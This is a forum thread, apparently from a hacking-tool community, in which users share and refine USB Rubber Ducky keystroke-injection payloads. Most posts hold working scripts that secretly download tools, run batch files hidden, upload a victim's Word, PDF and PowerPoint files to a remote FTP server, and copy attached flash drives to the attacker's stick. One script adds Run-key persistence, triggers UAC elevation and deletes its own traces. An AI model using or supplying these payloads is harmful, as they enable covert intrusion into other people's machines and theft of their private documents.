ebmar Posted December 2, 2014 Share Posted December 2, 2014 Hi. Just bought the rubber ducky and I love this little gadget! I figured out how to copy files from just my documents (see codes below), but I have problem going through subfolders. I want to do this basically: Get a batch job to search My documents and all subfolders for file extension .docx, .doc etc. and upload them with WinSCP. Also I want it to search for removable usb drive and search for .docx in root and all subfolders. I searched a lot and all examples says that you have to know the drive name (not letter). I have no idea how to go from here. This is my script for hidden copy so far: Rubber ducky.txt: DELAY 200 GUI r DELAY 200 STRING cmd ENTER DELAY 200 STRING cd %USERPROFILE% ENTER STRING ftp -i IP_ADDRESS ENTER DELAY 200 STRING USERNAME ENTER STRING PASSWORD ENTER STRING GET invisible.bat ENTER DELAY 200 STRING GET invisible.vbs ENTER DELAY 200 STRING BYE ENTER DELAY 200 STRING wscript.exe invisible.vbs invisible.bat ENTER DELAY 200 STRING exit ENTER It takes rubber ducky about 6 sec from when you put it in to the computer until you unplug it to download the files and run them hidden. invisible.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False This to run the .bat as hidden. invisible.bat bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe" bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com" cd %USERPROFILE%\documents "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit" This script runs in the background. bitsadmin to download WinSCP, and WinSCP to upload files to a ftp server. If you find the above scripts useful feel free to redistribute it as you wish. And thanks in advance. Quote Link to comment Share on other sites More sharing options...
Broti Posted December 2, 2014 Share Posted December 2, 2014 Hi and welcome, nice and clean payload. Gotta test it... I love the ducky, too. It's part of my toolkit. Quote Link to comment Share on other sites More sharing options...
ebmar Posted December 4, 2014 Author Share Posted December 4, 2014 I have almost no experience scripting, and I'm pretty much a retard when it comes to scripting, but I found out how to upload a whole folder with WinSCP. This is my new invisible.bat bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe" bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *documents" "close" "exit" I removed changing directory to documents, and changed WinSCP to just copy the whole documents directory. The problem with this is if the directory got a whole lot of large videos it would take a lot of time, meaning the computer must stay online over a long period of time. Does anybody know how to copy only certain files in a folder and all subfolders? Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 4, 2014 Share Posted December 4, 2014 (edited) You should look for some articles in stack overflow or something for recursing directories. Typically done with a for loop I think. Another thing you could do is archive the folder in question which will typically include all sub directories, save the archive someplace else on the system, and upload the archive to the destination server. This should install 7zip on a computer, but will not install if users are not admins: GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/project/sevenzip/7-Zip/9.20/7z920.exe?r=http%3A%2F%2Fwww.7-zip.org%2F&ts=1384902016&use_mirror=softlayer-dal','%TEMP%\7z920.exe'); Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\" ENTER I think this is a working script, it is for gathering flashdrives that are plugged into a system. If not, then there are two other files in it's directory, so may have to test later which one actually works. REM Author: overwraith REM Name: FlashDriveSlurp3.txt REM Purpose: Copies flash drives to the hard drive for later exfiltration. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to %TEMP%. *** STRING cd %TEMP% ENTER REM *** Delete 7zip files if they already exist. *** STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt ENTER REM *** Install 7zip. *** STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\' DELAY 500 ENTER REM *** Delay 7 Seconds. *** DELAY 7000 REM *** Switch from powershell back to command line. *** STRING CMD ENTER REM *** Delete batch file if it already exists. *** STRING erase /Q FlashDriveSlurp.bat ENTER REM *** Make batch file that copies flash drive data. *** STRING copy con FlashDriveSlurp.bat ENTER STRING @ECHO OFF ENTER STRING setlocal EnableDelayedExpansion ENTER REM *** Registry key that restarts script on reboot. *** STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f ENTER REM *** Make the destination we are 7zipping to. *** STRING set destination=%TEMP%\LOOT\%COMPUTERNAME% ENTER STRING if NOT EXIST %destination% mkdir %destination% ENTER STRING :while1 ENTER REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. *** STRING for /f %%A in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKYdrive=%%A ENTER STRING if [%DUCKYdrive%] NEQ [] ( ENTER STRING goto :break ENTER STRING ) ENTER REM *** Get the attached flash drives letters and drive name's. *** STRING set letters= ENTER STRING set drivename= ENTER STRING for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do ( STRING if [%%A] NEQ [] ( ENTER STRING if [%%B] NEQ [] ( ENTER STRING set letters=!letters! %%A ENTER STRING set drivename=!drivename! %%B ENTER STRING ))) ENTER REM *** 7zip the found flash drives. *** STRING set i=0 ENTER STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a ENTER STRING set i=0 ENTER STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a ENTER REM Set number to length of the array. STRING set n=%i% ENTER STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!\* ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM *** Copy to the ducky drive. *** STRING xcopy %destination%\* %DUCKYdrive%\LOOT\%COMPUTERNAME% /I ENTER REM *** Terminate execution, clean up after script. *** STRING erase /Q *.7z ENTER STRING rmdir /S /Q %TEMP%\LOOT ENTER STRING erase invis.vbs ENTER STRING erase /Q %0 ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists. *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly. *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly. *** STRING wscript.exe invis.vbs FlashDriveSlurp.bat ENTER REM *** Exit *** STRING EXIT ENTER STRING EXIT ENTER One of the hardest things about batch is knowing to enable delayed expansion, which means that if you have a variable referenced twice in a for loop, batch needs to take that into account. C:\Users\UserName>for /? Runs a specified command for each file in a set of files. FOR %variable IN (set) DO command [command-parameters] %variable Specifies a single letter replaceable parameter. (set) Specifies a set of one or more files. Wildcards may be used. command Specifies the command to carry out for each file. command-parameters Specifies parameters or switches for the specified command. To use the FOR command in a batch program, specify %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I. If Command Extensions are enabled, the following additional forms of the FOR command are supported: FOR /D %variable IN (set) DO command [command-parameters] If set contains wildcards, then specifies to match against directory names instead of file names. FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters] Walks the directory tree rooted at [drive:]path, executing the FOR statement in each directory of the tree. If no directory specification is specified after /R then the current directory is assumed. If set is just a single period (.) character then it will just enumerate the directory tree. FOR /L %variable IN (start,step,end) DO command [command-parameters] The set is a sequence of numbers from start to end, by step amount. So (1,1,5) would generate the sequence 1 2 3 4 5 and (5,-1,1) would generate the sequence (5 4 3 2 1) FOR /F ["options"] %variable IN (file-set) DO command [command-parameters] FOR /F ["options"] %variable IN ("string") DO command [command-parameters] FOR /F ["options"] %variable IN ('command') DO command [command-parameters] or, if usebackq option present: FOR /F ["options"] %variable IN (file-set) DO command [command-parameters] FOR /F ["options"] %variable IN ('string') DO command [command-parameters] FOR /F ["options"] %variable IN (`command`) DO command [command-parameters] file-set is one or more file names. Each file is opened, read and processed before going on to the next file in file-set. Processing consists of reading in the file, breaking it up into individual lines of text and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable value(s) set to the found token string(s). By default, /F passes the first blank separated token from each line of each file. Blank lines are skipped. You can override the default parsing behavior by specifying the optional "options" parameter. This is a quoted string which contains one or more keywords to specify different parsing options. The keywords are: eol=c - specifies an end of line comment character (just one) skip=n - specifies the number of lines to skip at the beginning of the file. delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab. tokens=x,y,m-n - specifies which tokens from each line are to be passed to the for body for each iteration. This will cause additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character in the tokens= string is an asterisk, then an additional variable is allocated and receives the remaining text on the line after the last token parsed. usebackq - specifies that the new semantics are in force, where a back quoted string is executed as a command and a single quoted string is a literal string command and allows the use of double quotes to quote file names in file-set. Some examples might help: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k would parse each line in myfile.txt, ignoring lines that begin with a semicolon, passing the 2nd and 3rd token from each line to the for body, with tokens delimited by commas and/or spaces. Notice the for body statements reference %i to get the 2nd token, %j to get the 3rd token, and %k to get all remaining tokens after the 3rd. For file names that contain spaces, you need to quote the filenames with double quotes. In order to use double quotes in this manner, you also need to use the usebackq option, otherwise the double quotes will be interpreted as defining a literal string to parse. %i is explicitly declared in the for statement and the %j and %k are implicitly declared via the tokens= option. You can specify up to 26 tokens via the tokens= line, provided it does not cause an attempt to declare a variable higher than the letter 'z' or 'Z'. Remember, FOR variables are single-letter, case sensitive, global, and you can't have more than 52 total active at any one time. You can also use the FOR /F parsing logic on an immediate string, by making the file-set between the parenthesis a quoted string, using single quote characters. It will be treated as a single line of input from a file and parsed. Finally, you can use the FOR /F command to parse the output of a command. You do this by making the file-set between the parenthesis a back quoted string. It will be treated as a command line, which is passed to a child CMD.EXE and the output is captured into memory and parsed as if it was a file. So the following example: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i would enumerate the environment variable names in the current environment. In addition, substitution of FOR variable references has been enhanced. You can now use the following optional syntax: %~I - expands %I removing any surrounding quotes (") %~fI - expands %I to a fully qualified path name %~dI - expands %I to a drive letter only %~pI - expands %I to a path only %~nI - expands %I to a file name only %~xI - expands %I to a file extension only %~sI - expanded path contains short names only %~aI - expands %I to file attributes of file %~tI - expands %I to date/time of file %~zI - expands %I to size of file %~$PATH:I - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable name is not defined or the file is not found by the search, then this modifier expands to the empty string The modifiers can be combined to get compound results: %~dpI - expands %I to a drive letter and path only %~nxI - expands %I to a file name and extension only %~fsI - expands %I to a full path name with short names only %~dp$PATH:I - searches the directories listed in the PATH environment variable for %I and expands to the drive letter and path of the first one found. %~ftzaI - expands %I to a DIR like output line In the above examples %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid FOR variable name. Picking upper case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive. C:\Users\UserName> Edited December 4, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
ebmar Posted December 4, 2014 Author Share Posted December 4, 2014 I tried to make sense and modify the script so I can use it, but I'm not that good in scripting. When I run the command: wmic volume where "drivetype=2" get driveletter /format:table | findstr : I get the list of removable usb disc, but I don't know how to cd in to that drive using the information wmic gave me. It's usually only one removable device attached. On the other hand! I got the script working to copy all subfolders in Documents, but I found it easier and faster to make it only copy certain filetypes (if it would contain large movies etc.). wscript.exe invisible.vbs wget.bat REM Download WinSCP bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe" bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com" REM Upload documents in Documents cd %USERPROFILE%\documents "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.ppt" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pptx" "close" "exit" REM Upload documents in subdirs cd %USERPROFILE% "%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.doc" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.docx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pdf" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.ppt" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit" "%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pptx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit" The other files are the same as of now. Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 4, 2014 Share Posted December 4, 2014 So for getting attached drives you use a command like this: for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do ( So in order to change directories to that drive you don't use CD in the prompt because cd doesn't change drives, it wont do anything. You need to type something along the lines of: D: So inside a loop it would be something like this: %%i: where "i" is your iterator. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.